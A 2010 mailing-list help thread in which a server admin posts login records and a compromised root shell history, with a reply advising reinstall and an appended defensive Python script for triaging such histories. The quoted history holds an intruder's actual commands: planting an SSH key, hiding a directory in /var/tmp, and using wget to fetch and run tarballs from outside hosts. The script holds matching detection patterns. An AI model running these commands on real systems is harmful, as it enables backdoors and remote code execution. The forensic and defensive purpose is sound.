help

Marti, Robert RJM002 at shsu.edu
Thu Jan 28 12:08:48 UTC 2010


Yes, you were hacked. Hope you have backups, because you should reinstall.

Sent from my iPhone

On Jan 28, 2010, at 0:11, "Joy Methew" <ml4joy at gmail.com> wrote:

> Hello all,
> I am using RHEL5.3 as my mail server with a real IP. I configure my
> system mostly remotely. The last login time of my system was 27 Jan,
> from this IP: 118.129.153.43.
> Then I tried to log in on 28 Jan in the morning, and I couldn't
> authenticate as root with my last password.
> Then I rebooted the system and reset my password.
> I logged in as root, then I ran the "last" command. I am sending the
> first 10 lines of the last command output... I think someone hacked my
> system. I am also sending the history command output.
> Now I have removed the .ssh directory and /var/tmp/*.
>
> Please suggest, what is this??
>
> Thanks
>
> last command output:
> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>
> What is 165.red-79........? This is not my IP.
>
>
> History Output
>
>  115  cat /proc/cpuinfo
>  116  mkdir .ssh
>  117  cd .ssh
>  118  echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>  119  cd /var/tmp
>  120  mkdir " "
>  121  cd " "
>  122  passwd
>  123  echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>  124  ps -x
>  125  cd /var/tmp
>  126  w
>  127  wget http://kok.ucoz.de/gosh.tgz
>  128  tar xvf gosh.tgz
>  129  cd gosh
>  130  chmod +x *
>  131  ./go.sh 121
>  132  w
>  133  ps -x
>  134  ps -aux
>  135  cd /var/tmp
>  136  cd " "
>  137  ls -a
>  138  wget http://helpbnc.myftp.org/danger/fld.tgz
>  139  tar xzvf fld.tgz
>  140  cd fld
>  141  chmod +x *
>  142  nano cyc.acc
>  143  nano cyc.acc.1
>  144  nano cyc.set
>  145  ./httpd
>  146  w
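Added example (not part of the original thread, and not code from either poster): a Python triage pass over a shell history like the one quoted above. It tracks `cd` so that downloads, `chmod +x` and `./` executions are flagged only when they run under a world-writable temp directory. The sample history is constructed and abbreviated from the post, with a placeholder key and host; the rule names and the `triage` function are hypothetical.

```python
import re

# Constructed sample, abbreviated from the history quoted above; the key and
# the download host are placeholders, not the values from the post.
SAMPLE_HISTORY = '''\
  116  mkdir .ssh
  118  echo ssh-rsa AAAAexample rsa-key >> ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys
  119  cd /var/tmp
  120  mkdir " "
  121  cd " "
  122  passwd
  125  cd /var/tmp
  127  wget http://example.invalid/gosh.tgz
  129  cd gosh
  130  chmod +x *
  131  ./go.sh 121
  133  ps -x
'''
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable staging areas
ALWAYS = [  # worth a look wherever they were run
    ("ssh-key-added", re.compile(r">>?\s*\S*authorized_keys")),
    ("whitespace-dir", re.compile(r"^mkdir\s+[\"']\s+[\"']$")),
    ("password-change", re.compile(r"^passwd\b")),
]
IN_TEMP = [  # flagged only when the working directory is under a temp dir
    ("download-in-temp", re.compile(r"^(wget|curl)\b.*https?://")),
    ("chmod-x-in-temp", re.compile(r"^chmod\s+\+x\b")),
    ("exec-in-temp", re.compile(r"^\./\S+")),
]

def triage(history_text, start_dir="~"):
    """Return [(history_number, tag)], following `cd` to track the working dir."""
    cwd, findings = start_dir, []
    for line in history_text.splitlines():
        m = re.match(r"\s*(\d+)\s+(.+)", line)
        if not m:
            continue
        num, cmd = int(m.group(1)), m.group(2).strip()
        cd = re.match(r"cd\s+(.+)$", cmd)
        if cd:
            target = cd.group(1).strip("\"'")  # keeps a name that is only spaces
            cwd = target if target[:1] in "/~" else cwd.rstrip("/") + "/" + target
            continue
        in_temp = any(cwd == d or cwd.startswith(d + "/") for d in TEMP_DIRS)
        for tag, rx in ALWAYS + (IN_TEMP if in_temp else []):
            if rx.search(cmd):
                findings.append((num, tag))
    return findings
```

Calling `triage(SAMPLE_HISTORY)` returns the history numbers to review first; the same function can be run over a saved copy of root's `.bash_history` taken before the machine is wiped.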